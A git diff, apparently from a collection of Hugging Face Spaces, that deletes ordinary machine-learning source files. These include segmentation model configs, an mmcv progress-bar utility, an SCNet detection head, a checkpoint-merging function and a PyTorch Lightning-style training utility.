- if sorted(list(ckpt1.keys())) != sorted(list(ckpt2.keys())):
- return "Fail to merge the models. The model architectures are not the same."
- opt = OrderedDict()
- opt["weight"] = {}
- for key in ckpt1.keys():
- # try:
- if key == "emb_g.weight" and ckpt1[key].shape != ckpt2[key].shape:
- min_shape0 = min(ckpt1[key].shape[0], ckpt2[key].shape[0])
- opt["weight"][key] = (
- alpha1 * (ckpt1[key][:min_shape0].float())
- + (1 - alpha1) * (ckpt2[key][:min_shape0].float())
- ).half()
- else:
- opt["weight"][key] = (
- alpha1 * (ckpt1[key].float()) + (1 - alpha1) * (ckpt2[key].float())
- ).half()
- # except:
- # pdb.set_trace()
- opt["config"] = cfg
- """
- if(sr=="40k"):opt["config"] = [1025, 32, 192, 192, 768, 2, 6, 3, 0, "1", [3, 7, 11], [[1, 3, 5], [1, 3, 5], [1, 3, 5]], [10, 10, 2, 2], 512, [16, 16, 4, 4,4], 109, 256, 40000]
- elif(sr=="48k"):opt["config"] = [1025, 32, 192, 192, 768, 2, 6, 3, 0, "1", [3, 7, 11], [[1, 3, 5], [1, 3, 5], [1, 3, 5]], [10,6,2,2,2], 512, [16, 16, 4, 4], 109, 256, 48000]
- elif(sr=="32k"):opt["config"] = [513, 32, 192, 192, 768, 2, 6, 3, 0, "1", [3, 7, 11], [[1, 3, 5], [1, 3, 5], [1, 3, 5]], [10, 4, 2, 2, 2], 512, [16, 16, 4, 4,4], 109, 256, 32000]
- """
- opt["sr"] = sr
- opt["f0"] = 1 if f0 == i18n("是") else 0
- opt["version"] = version
- opt["info"] = info
- torch.save(opt, "weights/%s.pth" % name)
- return "Success."
- except:
- return traceback.format_exc()
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/configs/_base_/models/danet_r50-d8.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/configs/_base_/models/danet_r50-d8.py
deleted file mode 100644
index 2c934939fac48525f22ad86f489a041dd7db7d09..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/configs/_base_/models/danet_r50-d8.py
+++ /dev/null
@@ -1,44 +0,0 @@
-# model settings
-norm_cfg = dict(type='SyncBN', requires_grad=True)
-model = dict(
- type='EncoderDecoder',
- pretrained='open-mmlab://resnet50_v1c',
- backbone=dict(
- type='ResNetV1c',
- depth=50,
- num_stages=4,
- out_indices=(0, 1, 2, 3),
- dilations=(1, 1, 2, 4),
- strides=(1, 2, 1, 1),
- norm_cfg=norm_cfg,
- norm_eval=False,
- style='pytorch',
- contract_dilation=True),
- decode_head=dict(
- type='DAHead',
- in_channels=2048,
- in_index=3,
- channels=512,
- pam_channels=64,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
- auxiliary_head=dict(
- type='FCNHead',
- in_channels=1024,
- in_index=2,
- channels=256,
- num_convs=1,
- concat_input=False,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),
- # model training and testing settings
- train_cfg=dict(),
- test_cfg=dict(mode='whole'))
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/utils/progressbar.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/utils/progressbar.py
deleted file mode 100644
index 0062f670dd94fa9da559ab26ef85517dcf5211c7..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/utils/progressbar.py
+++ /dev/null
@@ -1,208 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-import sys
-from collections.abc import Iterable
-from multiprocessing import Pool
-from shutil import get_terminal_size
-
-from .timer import Timer
-
-
-class ProgressBar:
- """A progress bar which can print the progress."""
-
- def __init__(self, task_num=0, bar_width=50, start=True, file=sys.stdout):
- self.task_num = task_num
- self.bar_width = bar_width
- self.completed = 0
- self.file = file
- if start:
- self.start()
-
- @property
- def terminal_width(self):
- width, _ = get_terminal_size()
- return width
-
- def start(self):
- if self.task_num > 0:
- self.file.write(f'[{" " * self.bar_width}] 0/{self.task_num}, '
- 'elapsed: 0s, ETA:')
- else:
- self.file.write('completed: 0, elapsed: 0s')
- self.file.flush()
- self.timer = Timer()
-
- def update(self, num_tasks=1):
- assert num_tasks > 0
- self.completed += num_tasks
- elapsed = self.timer.since_start()
- if elapsed > 0:
- fps = self.completed / elapsed
- else:
- fps = float('inf')
- if self.task_num > 0:
- percentage = self.completed / float(self.task_num)
- eta = int(elapsed * (1 - percentage) / percentage + 0.5)
- msg = f'\r[{{}}] {self.completed}/{self.task_num}, ' \
- f'{fps:.1f} task/s, elapsed: {int(elapsed + 0.5)}s, ' \
- f'ETA: {eta:5}s'
-
- bar_width = min(self.bar_width,
- int(self.terminal_width - len(msg)) + 2,
- int(self.terminal_width * 0.6))
- bar_width = max(2, bar_width)
- mark_width = int(bar_width * percentage)
- bar_chars = '>' * mark_width + ' ' * (bar_width - mark_width)
- self.file.write(msg.format(bar_chars))
- else:
- self.file.write(
- f'completed: {self.completed}, elapsed: {int(elapsed + 0.5)}s,'
- f' {fps:.1f} tasks/s')
- self.file.flush()
-
-
-def track_progress(func, tasks, bar_width=50, file=sys.stdout, **kwargs):
- """Track the progress of tasks execution with a progress bar.
-
- Tasks are done with a simple for-loop.
-
- Args:
- func (callable): The function to be applied to each task.
- tasks (list or tuple[Iterable, int]): A list of tasks or
- (tasks, total num).
- bar_width (int): Width of progress bar.
-
- Returns:
- list: The task results.
- """
- if isinstance(tasks, tuple):
- assert len(tasks) == 2
- assert isinstance(tasks[0], Iterable)
- assert isinstance(tasks[1], int)
- task_num = tasks[1]
- tasks = tasks[0]
- elif isinstance(tasks, Iterable):
- task_num = len(tasks)
- else:
- raise TypeError(
- '"tasks" must be an iterable object or a (iterator, int) tuple')
- prog_bar = ProgressBar(task_num, bar_width, file=file)
- results = []
- for task in tasks:
- results.append(func(task, **kwargs))
- prog_bar.update()
- prog_bar.file.write('\n')
- return results
-
-
-def init_pool(process_num, initializer=None, initargs=None):
- if initializer is None:
- return Pool(process_num)
- elif initargs is None:
- return Pool(process_num, initializer)
- else:
- if not isinstance(initargs, tuple):
- raise TypeError('"initargs" must be a tuple')
- return Pool(process_num, initializer, initargs)
-
-
-def track_parallel_progress(func,
- tasks,
- nproc,
- initializer=None,
- initargs=None,
- bar_width=50,
- chunksize=1,
- skip_first=False,
- keep_order=True,
- file=sys.stdout):
- """Track the progress of parallel task execution with a progress bar.
-
- The built-in :mod:`multiprocessing` module is used for process pools and
- tasks are done with :func:`Pool.map` or :func:`Pool.imap_unordered`.
-
- Args:
- func (callable): The function to be applied to each task.
- tasks (list or tuple[Iterable, int]): A list of tasks or
- (tasks, total num).
- nproc (int): Process (worker) number.
- initializer (None or callable): Refer to :class:`multiprocessing.Pool`
- for details.
- initargs (None or tuple): Refer to :class:`multiprocessing.Pool` for
- details.
- chunksize (int): Refer to :class:`multiprocessing.Pool` for details.
- bar_width (int): Width of progress bar.
- skip_first (bool): Whether to skip the first sample for each worker
- when estimating fps, since the initialization step may takes
- longer.
- keep_order (bool): If True, :func:`Pool.imap` is used, otherwise
- :func:`Pool.imap_unordered` is used.
-
- Returns:
- list: The task results.
- """
- if isinstance(tasks, tuple):
- assert len(tasks) == 2
- assert isinstance(tasks[0], Iterable)
- assert isinstance(tasks[1], int)
- task_num = tasks[1]
- tasks = tasks[0]
- elif isinstance(tasks, Iterable):
- task_num = len(tasks)
- else:
- raise TypeError(
- '"tasks" must be an iterable object or a (iterator, int) tuple')
- pool = init_pool(nproc, initializer, initargs)
- start = not skip_first
- task_num -= nproc * chunksize * int(skip_first)
- prog_bar = ProgressBar(task_num, bar_width, start, file=file)
- results = []
- if keep_order:
- gen = pool.imap(func, tasks, chunksize)
- else:
- gen = pool.imap_unordered(func, tasks, chunksize)
- for result in gen:
- results.append(result)
- if skip_first:
- if len(results) < nproc * chunksize:
- continue
- elif len(results) == nproc * chunksize:
- prog_bar.start()
- continue
- prog_bar.update()
- prog_bar.file.write('\n')
- pool.close()
- pool.join()
- return results
-
-
-def track_iter_progress(tasks, bar_width=50, file=sys.stdout):
- """Track the progress of tasks iteration or enumeration with a progress
- bar.
-
- Tasks are yielded with a simple for-loop.
-
- Args:
- tasks (list or tuple[Iterable, int]): A list of tasks or
- (tasks, total num).
- bar_width (int): Width of progress bar.
-
- Yields:
- list: The task results.
- """
- if isinstance(tasks, tuple):
- assert len(tasks) == 2
- assert isinstance(tasks[0], Iterable)
- assert isinstance(tasks[1], int)
- task_num = tasks[1]
- tasks = tasks[0]
- elif isinstance(tasks, Iterable):
- task_num = len(tasks)
- else:
- raise TypeError(
- '"tasks" must be an iterable object or a (iterator, int) tuple')
- prog_bar = ProgressBar(task_num, bar_width, file=file)
- for task in tasks:
- yield task
- prog_bar.update()
- prog_bar.file.write('\n')
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/bbox_heads/scnet_bbox_head.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/bbox_heads/scnet_bbox_head.py
deleted file mode 100644
index 35758f4f4e3b2bddd460edb8a7f482b3a9da2919..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/bbox_heads/scnet_bbox_head.py
+++ /dev/null
@@ -1,76 +0,0 @@
-from mmdet.models.builder import HEADS
-from .convfc_bbox_head import ConvFCBBoxHead
-
-
-@HEADS.register_module()
-class SCNetBBoxHead(ConvFCBBoxHead):
- """BBox head for `SCNet `_.
-
- This inherits ``ConvFCBBoxHead`` with modified forward() function, allow us
- to get intermediate shared feature.
- """
-
- def _forward_shared(self, x):
- """Forward function for shared part."""
- if self.num_shared_convs > 0:
- for conv in self.shared_convs:
- x = conv(x)
-
- if self.num_shared_fcs > 0:
- if self.with_avg_pool:
- x = self.avg_pool(x)
-
- x = x.flatten(1)
-
- for fc in self.shared_fcs:
- x = self.relu(fc(x))
-
- return x
-
- def _forward_cls_reg(self, x):
- """Forward function for classification and regression parts."""
- x_cls = x
- x_reg = x
-
- for conv in self.cls_convs:
- x_cls = conv(x_cls)
- if x_cls.dim() > 2:
- if self.with_avg_pool:
- x_cls = self.avg_pool(x_cls)
- x_cls = x_cls.flatten(1)
- for fc in self.cls_fcs:
- x_cls = self.relu(fc(x_cls))
-
- for conv in self.reg_convs:
- x_reg = conv(x_reg)
- if x_reg.dim() > 2:
- if self.with_avg_pool:
- x_reg = self.avg_pool(x_reg)
- x_reg = x_reg.flatten(1)
- for fc in self.reg_fcs:
- x_reg = self.relu(fc(x_reg))
-
- cls_score = self.fc_cls(x_cls) if self.with_cls else None
- bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
-
- return cls_score, bbox_pred
-
- def forward(self, x, return_shared_feat=False):
- """Forward function.
-
- Args:
- x (Tensor): input features
- return_shared_feat (bool): If True, return cls-reg-shared feature.
-
- Return:
- out (tuple[Tensor]): contain ``cls_score`` and ``bbox_pred``,
- if ``return_shared_feat`` is True, append ``x_shared`` to the
- returned tuple.
- """
- x_shared = self._forward_shared(x)
- out = self._forward_cls_reg(x_shared)
-
- if return_shared_feat:
- out += (x_shared, )
-
- return out
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/upernet_r50.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/upernet_r50.py
deleted file mode 100644
index 10974962fdd7136031fd06de1700f497d355ceaa..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/upernet_r50.py
+++ /dev/null
@@ -1,44 +0,0 @@
-# model settings
-norm_cfg = dict(type='SyncBN', requires_grad=True)
-model = dict(
- type='EncoderDecoder',
- pretrained='open-mmlab://resnet50_v1c',
- backbone=dict(
- type='ResNetV1c',
- depth=50,
- num_stages=4,
- out_indices=(0, 1, 2, 3),
- dilations=(1, 1, 1, 1),
- strides=(1, 2, 2, 2),
- norm_cfg=norm_cfg,
- norm_eval=False,
- style='pytorch',
- contract_dilation=True),
- decode_head=dict(
- type='UPerHead',
- in_channels=[256, 512, 1024, 2048],
- in_index=[0, 1, 2, 3],
- pool_scales=(1, 2, 3, 6),
- channels=512,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
- auxiliary_head=dict(
- type='FCNHead',
- in_channels=1024,
- in_index=2,
- channels=256,
- num_convs=1,
- concat_input=False,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),
- # model training and testing settings
- train_cfg=dict(),
- test_cfg=dict(mode='whole'))
diff --git a/spaces/Rongjiehuang/ProDiff/utils/pl_utils.py b/spaces/Rongjiehuang/ProDiff/utils/pl_utils.py
deleted file mode 100644
index 76a94ed6abe22e349c51c49afdbf052d52b8d98b..0000000000000000000000000000000000000000
--- a/spaces/Rongjiehuang/ProDiff/utils/pl_utils.py
+++ /dev/null
@@ -1,1618 +0,0 @@
-import matplotlib
-from torch.nn import DataParallel
-from torch.nn.parallel import DistributedDataParallel
-
-matplotlib.use('Agg')
-import glob
-import itertools
-import subprocess
-import threading
-import traceback
-
-from pytorch_lightning.callbacks import GradientAccumulationScheduler
-from pytorch_lightning.callbacks import ModelCheckpoint
-
-from functools import wraps
-from torch.cuda._utils import _get_device_index
-import numpy as np
-import torch.optim
-import torch.utils.data
-import copy
-import logging
-import os
-import re
-import sys
-import torch
-import torch.distributed as dist
-import torch.multiprocessing as mp
-import tqdm
-from torch.optim.optimizer import Optimizer
-
-
-def get_a_var(obj): # pragma: no cover
- if isinstance(obj, torch.Tensor):
- return obj
-
- if isinstance(obj, list) or isinstance(obj, tuple):
- for result in map(get_a_var, obj):
- if isinstance(result, torch.Tensor):
- return result
- if isinstance(obj, dict):
- for result in map(get_a_var, obj.items()):
- if isinstance(result, torch.Tensor):
- return result
- return None
-
-
-def data_loader(fn):
- """
- Decorator to make any fx with this use the lazy property
- :param fn:
- :return:
- """
-
- wraps(fn)
- attr_name = '_lazy_' + fn.__name__
-
- def _get_data_loader(self):
- try:
- value = getattr(self, attr_name)
- except AttributeError:
- try:
- value = fn(self) # Lazy evaluation, done only once.
- if (
- value is not None and
- not isinstance(value, list) and
- fn.__name__ in ['test_dataloader', 'val_dataloader']
- ):
- value = [value]
- except AttributeError as e:
- # Guard against AttributeError suppression. (Issue #142)
- traceback.print_exc()
- error = f'{fn.__name__}: An AttributeError was encountered: ' + str(e)
- raise RuntimeError(error) from e
- setattr(self, attr_name, value) # Memoize evaluation.
- return value
-
- return _get_data_loader
-
-
-def parallel_apply(modules, inputs, kwargs_tup=None, devices=None): # pragma: no cover
- r"""Applies each `module` in :attr:`modules` in parallel on arguments
- contained in :attr:`inputs` (positional) and :attr:`kwargs_tup` (keyword)
- on each of :attr:`devices`.
-
- Args:
- modules (Module): modules to be parallelized
- inputs (tensor): inputs to the modules
- devices (list of int or torch.device): CUDA devices
-
- :attr:`modules`, :attr:`inputs`, :attr:`kwargs_tup` (if given), and
- :attr:`devices` (if given) should all have same length. Moreover, each
- element of :attr:`inputs` can either be a single object as the only argument
- to a module, or a collection of positional arguments.
- """
- assert len(modules) == len(inputs)
- if kwargs_tup is not None:
- assert len(modules) == len(kwargs_tup)
- else:
- kwargs_tup = ({},) * len(modules)
- if devices is not None:
- assert len(modules) == len(devices)
- else:
- devices = [None] * len(modules)
- devices = list(map(lambda x: _get_device_index(x, True), devices))
- lock = threading.Lock()
- results = {}
- grad_enabled = torch.is_grad_enabled()
-
- def _worker(i, module, input, kwargs, device=None):
- torch.set_grad_enabled(grad_enabled)
- if device is None:
- device = get_a_var(input).get_device()
- try:
- with torch.cuda.device(device):
- # this also avoids accidental slicing of `input` if it is a Tensor
- if not isinstance(input, (list, tuple)):
- input = (input,)
-
- # ---------------
- # CHANGE
- if module.training:
- output = module.training_step(*input, **kwargs)
-
- elif module.testing:
- output = module.test_step(*input, **kwargs)
-
- else:
- output = module.validation_step(*input, **kwargs)
- # ---------------
-
- with lock:
- results[i] = output
- except Exception as e:
- with lock:
- results[i] = e
-
- # make sure each module knows what training state it's in...
- # fixes weird bug where copies are out of sync
- root_m = modules[0]
- for m in modules[1:]:
- m.training = root_m.training
- m.testing = root_m.testing
-
- if len(modules) > 1:
- threads = [threading.Thread(target=_worker,
- args=(i, module, input, kwargs, device))
- for i, (module, input, kwargs, device) in
- enumerate(zip(modules, inputs, kwargs_tup, devices))]
-
- for thread in threads:
- thread.start()
- for thread in threads:
- thread.join()
- else:
- _worker(0, modules[0], inputs[0], kwargs_tup[0], devices[0])
-
- outputs = []
- for i in range(len(inputs)):
- output = results[i]
- if isinstance(output, Exception):
- raise output
- outputs.append(output)
- return outputs
-
-
-def _find_tensors(obj): # pragma: no cover
- r"""
- Recursively find all tensors contained in the specified object.
- """
- if isinstance(obj, torch.Tensor):
- return [obj]
- if isinstance(obj, (list, tuple)):
- return itertools.chain(*map(_find_tensors, obj))
- if isinstance(obj, dict):
- return itertools.chain(*map(_find_tensors, obj.values()))
- return []
-
-
-class DDP(DistributedDataParallel):
- """
- Override the forward call in lightning so it goes to training and validation step respectively
- """
-
- def parallel_apply(self, replicas, inputs, kwargs):
- return parallel_apply(replicas, inputs, kwargs, self.device_ids[:len(replicas)])
-
- def forward(self, *inputs, **kwargs): # pragma: no cover
- self._sync_params()
- if self.device_ids:
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- if len(self.device_ids) == 1:
- # --------------
- # LIGHTNING MOD
- # --------------
- # normal
- # output = self.module(*inputs[0], **kwargs[0])
- # lightning
- if self.module.training:
- output = self.module.training_step(*inputs[0], **kwargs[0])
- elif self.module.testing:
- output = self.module.test_step(*inputs[0], **kwargs[0])
- else:
- output = self.module.validation_step(*inputs[0], **kwargs[0])
- else:
- outputs = self.parallel_apply(self._module_copies[:len(inputs)], inputs, kwargs)
- output = self.gather(outputs, self.output_device)
- else:
- # normal
- output = self.module(*inputs, **kwargs)
-
- if torch.is_grad_enabled():
- # We'll return the output object verbatim since it is a freeform
- # object. We need to find any tensors in this object, though,
- # because we need to figure out which parameters were used during
- # this forward pass, to ensure we short circuit reduction for any
- # unused parameters. Only if `find_unused_parameters` is set.
- if self.find_unused_parameters:
- self.reducer.prepare_for_backward(list(_find_tensors(output)))
- else:
- self.reducer.prepare_for_backward([])
- return output
-
-
-class DP(DataParallel):
- """
- Override the forward call in lightning so it goes to training and validation step respectively
- """
-
- def forward(self, *inputs, **kwargs):
- if not self.device_ids:
- return self.module(*inputs, **kwargs)
-
- for t in itertools.chain(self.module.parameters(), self.module.buffers()):
- if t.device != self.src_device_obj:
- raise RuntimeError("module must have its parameters and buffers "
- "on device {} (device_ids[0]) but found one of "
- "them on device: {}".format(self.src_device_obj, t.device))
-
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- if len(self.device_ids) == 1:
- # lightning
- if self.module.training:
- return self.module.training_step(*inputs[0], **kwargs[0])
- elif self.module.testing:
- return self.module.test_step(*inputs[0], **kwargs[0])
- else:
- return self.module.validation_step(*inputs[0], **kwargs[0])
-
- replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
- outputs = self.parallel_apply(replicas, inputs, kwargs)
- return self.gather(outputs, self.output_device)
-
- def parallel_apply(self, replicas, inputs, kwargs):
- return parallel_apply(replicas, inputs, kwargs, self.device_ids[:len(replicas)])
-
-
-class GradientAccumulationScheduler:
- def __init__(self, scheduling: dict):
- if scheduling == {}: # empty dict error
- raise TypeError("Empty dict cannot be interpreted correct")
-
- for key in scheduling.keys():
- if not isinstance(key, int) or not isinstance(scheduling[key], int):
- raise TypeError("All epoches and accumulation factor must be integers")
-
- minimal_epoch = min(scheduling.keys())
- if minimal_epoch < 1:
- msg = f"Epochs indexing from 1, epoch {minimal_epoch} cannot be interpreted correct"
- raise IndexError(msg)
- elif minimal_epoch != 1: # if user didnt define first epoch accumulation factor
- scheduling.update({1: 1})
-
- self.scheduling = scheduling
- self.epochs = sorted(scheduling.keys())
-
- def on_epoch_begin(self, epoch, trainer):
- epoch += 1 # indexing epochs from 1
- for i in reversed(range(len(self.epochs))):
- if epoch >= self.epochs[i]:
- trainer.accumulate_grad_batches = self.scheduling.get(self.epochs[i])
- break
-
-
-class LatestModelCheckpoint(ModelCheckpoint):
- def __init__(self, filepath, monitor='val_loss', verbose=0, num_ckpt_keep=5,
- save_weights_only=False, mode='auto', period=1, prefix='model', save_best=True):
- super(ModelCheckpoint, self).__init__()
- self.monitor = monitor
- self.verbose = verbose
- self.filepath = filepath
- os.makedirs(filepath, exist_ok=True)
- self.num_ckpt_keep = num_ckpt_keep
- self.save_best = save_best
- self.save_weights_only = save_weights_only
- self.period = period
- self.epochs_since_last_check = 0
- self.prefix = prefix
- self.best_k_models = {}
- # {filename: monitor}
- self.kth_best_model = ''
- self.save_top_k = 1
- self.task = None
- if mode == 'min':
- self.monitor_op = np.less
- self.best = np.Inf
- self.mode = 'min'
- elif mode == 'max':
- self.monitor_op = np.greater
- self.best = -np.Inf
- self.mode = 'max'
- else:
- if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):
- self.monitor_op = np.greater
- self.best = -np.Inf
- self.mode = 'max'
- else:
- self.monitor_op = np.less
- self.best = np.Inf
- self.mode = 'min'
- if os.path.exists(f'{self.filepath}/best_valid.npy'):
- self.best = np.load(f'{self.filepath}/best_valid.npy')[0]
-
- def get_all_ckpts(self):
- return sorted(glob.glob(f'{self.filepath}/{self.prefix}_ckpt_steps_*.ckpt'),
- key=lambda x: -int(re.findall('.*steps\_(\d+)\.ckpt', x)[0]))
-
- def on_epoch_end(self, epoch, logs=None):
- logs = logs or {}
- self.epochs_since_last_check += 1
- best_filepath = f'{self.filepath}/{self.prefix}_ckpt_best.pt'
- if self.epochs_since_last_check >= self.period:
- self.epochs_since_last_check = 0
- filepath = f'{self.filepath}/{self.prefix}_ckpt_steps_{self.task.global_step}.ckpt'
- if self.verbose > 0:
- logging.info(f'Epoch {epoch:05d}@{self.task.global_step}: saving model to {filepath}')
- self._save_model(filepath)
- for old_ckpt in self.get_all_ckpts()[self.num_ckpt_keep:]:
- subprocess.check_call(f'rm -rf "{old_ckpt}"', shell=True)
- if self.verbose > 0:
- logging.info(f'Delete ckpt: {os.path.basename(old_ckpt)}')
- current = logs.get(self.monitor)
- if current is not None and self.save_best:
- if self.monitor_op(current, self.best):
- self.best = current
- if self.verbose > 0:
- logging.info(
- f'Epoch {epoch:05d}@{self.task.global_step}: {self.monitor} reached'
- f' {current:0.5f} (best {self.best:0.5f}), saving model to'
- f' {best_filepath} as top 1')
- self._save_model(best_filepath)
- np.save(f'{self.filepath}/best_valid.npy', [self.best])
-
-
-class BaseTrainer:
- def __init__(
- self,
- logger=True,
- checkpoint_callback=True,
- default_save_path=None,
- gradient_clip_val=0,
- process_position=0,
- gpus=-1,
- log_gpu_memory=None,
- show_progress_bar=True,
- track_grad_norm=-1,
- check_val_every_n_epoch=1,
- accumulate_grad_batches=1,
- max_updates=1000,
- min_epochs=1,
- val_check_interval=1.0,
- log_save_interval=100,
- row_log_interval=10,
- print_nan_grads=False,
- weights_summary='full',
- num_sanity_val_steps=5,
- resume_from_checkpoint=None,
- ):
- self.log_gpu_memory = log_gpu_memory
- self.gradient_clip_val = gradient_clip_val
- self.check_val_every_n_epoch = check_val_every_n_epoch
- self.track_grad_norm = track_grad_norm
- self.on_gpu = True if (gpus and torch.cuda.is_available()) else False
- self.process_position = process_position
- self.weights_summary = weights_summary
- self.max_updates = max_updates
- self.min_epochs = min_epochs
- self.num_sanity_val_steps = num_sanity_val_steps
- self.print_nan_grads = print_nan_grads
- self.resume_from_checkpoint = resume_from_checkpoint
- self.default_save_path = default_save_path
-
- # training bookeeping
- self.total_batch_idx = 0
- self.running_loss = []
- self.avg_loss = 0
- self.batch_idx = 0
- self.tqdm_metrics = {}
- self.callback_metrics = {}
- self.num_val_batches = 0
- self.num_training_batches = 0
- self.num_test_batches = 0
- self.get_train_dataloader = None
- self.get_test_dataloaders = None
- self.get_val_dataloaders = None
- self.is_iterable_train_dataloader = False
-
- # training state
- self.model = None
- self.testing = False
- self.disable_validation = False
- self.lr_schedulers = []
- self.optimizers = None
- self.global_step = 0
- self.current_epoch = 0
- self.total_batches = 0
-
- # configure checkpoint callback
- self.checkpoint_callback = checkpoint_callback
- self.checkpoint_callback.save_function = self.save_checkpoint
- self.weights_save_path = self.checkpoint_callback.filepath
-
- # accumulated grads
- self.configure_accumulated_gradients(accumulate_grad_batches)
-
- # allow int, string and gpu list
- self.data_parallel_device_ids = [
- int(x) for x in os.environ.get("CUDA_VISIBLE_DEVICES", "").split(",") if x != '']
- if len(self.data_parallel_device_ids) == 0:
- self.root_gpu = None
- self.on_gpu = False
- else:
- self.root_gpu = self.data_parallel_device_ids[0]
- self.on_gpu = True
-
- # distributed backend choice
- self.use_ddp = False
- self.use_dp = False
- self.single_gpu = False
- self.distributed_backend = 'ddp' if self.num_gpus > 0 else 'dp'
- self.set_distributed_mode(self.distributed_backend)
-
- self.proc_rank = 0
- self.world_size = 1
- self.node_rank = 0
-
- # can't init progress bar here because starting a new process
- # means the progress_bar won't survive pickling
- self.show_progress_bar = show_progress_bar
-
- # logging
- self.log_save_interval = log_save_interval
- self.val_check_interval = val_check_interval
- self.logger = logger
- self.logger.rank = 0
- self.row_log_interval = row_log_interval
-
- @property
- def num_gpus(self):
- gpus = self.data_parallel_device_ids
- if gpus is None:
- return 0
- else:
- return len(gpus)
-
- @property
- def data_parallel(self):
- return self.use_dp or self.use_ddp
-
- def get_model(self):
- is_dp_module = isinstance(self.model, (DDP, DP))
- model = self.model.module if is_dp_module else self.model
- return model
-
- # -----------------------------
- # MODEL TRAINING
- # -----------------------------
- def fit(self, model):
- if self.use_ddp:
- mp.spawn(self.ddp_train, nprocs=self.num_gpus, args=(model,))
- else:
- model.model = model.build_model()
- if not self.testing:
- self.optimizers, self.lr_schedulers = self.init_optimizers(model.configure_optimizers())
- if self.use_dp:
- model.cuda(self.root_gpu)
- model = DP(model, device_ids=self.data_parallel_device_ids)
- elif self.single_gpu:
- model.cuda(self.root_gpu)
- self.run_pretrain_routine(model)
- return 1
-
- def init_optimizers(self, optimizers):
-
- # single optimizer
- if isinstance(optimizers, Optimizer):
- return [optimizers], []
-
- # two lists
- elif len(optimizers) == 2 and isinstance(optimizers[0], list):
- optimizers, lr_schedulers = optimizers
- return optimizers, lr_schedulers
-
- # single list or tuple
- elif isinstance(optimizers, list) or isinstance(optimizers, tuple):
- return optimizers, []
-
- def run_pretrain_routine(self, model):
- """Sanity check a few things before starting actual training.
-
- :param model:
- """
- ref_model = model
- if self.data_parallel:
- ref_model = model.module
-
- # give model convenience properties
- ref_model.trainer = self
-
- # set local properties on the model
- self.copy_trainer_model_properties(ref_model)
-
- # link up experiment object
- if self.logger is not None:
- ref_model.logger = self.logger
- self.logger.save()
-
- if self.use_ddp:
- dist.barrier()
-
- # set up checkpoint callback
- # self.configure_checkpoint_callback()
-
- # transfer data loaders from model
- self.get_dataloaders(ref_model)
-
- # track model now.
- # if cluster resets state, the model will update with the saved weights
- self.model = model
-
- # restore training and model before hpc call
- self.restore_weights(model)
-
- # when testing requested only run test and return
- if self.testing:
- self.run_evaluation(test=True)
- return
-
- # check if we should run validation during training
- self.disable_validation = self.num_val_batches == 0
-
- # run tiny validation (if validation defined)
- # to make sure program won't crash during val
- ref_model.on_sanity_check_start()
- ref_model.on_train_start()
- if not self.disable_validation and self.num_sanity_val_steps > 0:
- # init progress bars for validation sanity check
- pbar = tqdm.tqdm(desc='Validation sanity check',
- total=self.num_sanity_val_steps * len(self.get_val_dataloaders()),
- leave=False, position=2 * self.process_position,
- disable=not self.show_progress_bar, dynamic_ncols=True, unit='batch')
- self.main_progress_bar = pbar
- # dummy validation progress bar
- self.val_progress_bar = tqdm.tqdm(disable=True)
-
- self.evaluate(model, self.get_val_dataloaders(), self.num_sanity_val_steps, self.testing)
-
- # close progress bars
- self.main_progress_bar.close()
- self.val_progress_bar.close()
-
- # init progress bar
- pbar = tqdm.tqdm(leave=True, position=2 * self.process_position,
- disable=not self.show_progress_bar, dynamic_ncols=True, unit='batch',
- file=sys.stdout)
- self.main_progress_bar = pbar
-
- # clear cache before training
- if self.on_gpu:
- torch.cuda.empty_cache()
-
- # CORE TRAINING LOOP
- self.train()
-
- def test(self, model):
- self.testing = True
- self.fit(model)
-
- @property
- def training_tqdm_dict(self):
- tqdm_dict = {
- 'step': '{}'.format(self.global_step),
- }
- tqdm_dict.update(self.tqdm_metrics)
- return tqdm_dict
-
- # --------------------
- # restore ckpt
- # --------------------
- def restore_weights(self, model):
- """
- To restore weights we have two cases.
- First, attempt to restore hpc weights. If successful, don't restore
- other weights.
-
- Otherwise, try to restore actual weights
- :param model:
- :return:
- """
- # clear cache before restore
- if self.on_gpu:
- torch.cuda.empty_cache()
-
- if self.resume_from_checkpoint is not None:
- self.restore(self.resume_from_checkpoint, on_gpu=self.on_gpu)
- else:
- # restore weights if same exp version
- self.restore_state_if_checkpoint_exists(model)
-
- # wait for all models to restore weights
- if self.use_ddp:
- # wait for all processes to catch up
- dist.barrier()
-
- # clear cache after restore
- if self.on_gpu:
- torch.cuda.empty_cache()
-
- def restore_state_if_checkpoint_exists(self, model):
- did_restore = False
-
